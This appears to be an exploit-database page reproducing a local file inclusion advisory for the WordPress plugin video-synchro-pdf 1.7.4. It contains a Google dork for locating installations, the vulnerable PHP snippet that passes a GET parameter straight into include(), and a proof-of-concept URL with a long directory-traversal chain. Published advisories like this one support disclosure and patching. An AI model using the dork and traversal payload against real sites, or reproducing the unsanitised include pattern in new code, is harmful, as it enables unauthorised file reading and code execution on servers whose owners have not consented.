wordpress plugin videosynchropdf 1.7.4 local file inclusion
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion # Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ # Date: 26-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/ # Version: 1.7.4 # Tested on: Firefox # Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php # Vulnerable Code: ``` <?php if ($_GET['p']<=NULL) { include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php'); }else{ include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php'); } ``` # Proof of Concept: http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p= <http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI] Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>
Wordpress plugin videosynchropdf 1.7.4 local file inclusion Vulnerability / Exploit Source : Wordpress plugin videosynchropdf 1.7.4 local file inclusion
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes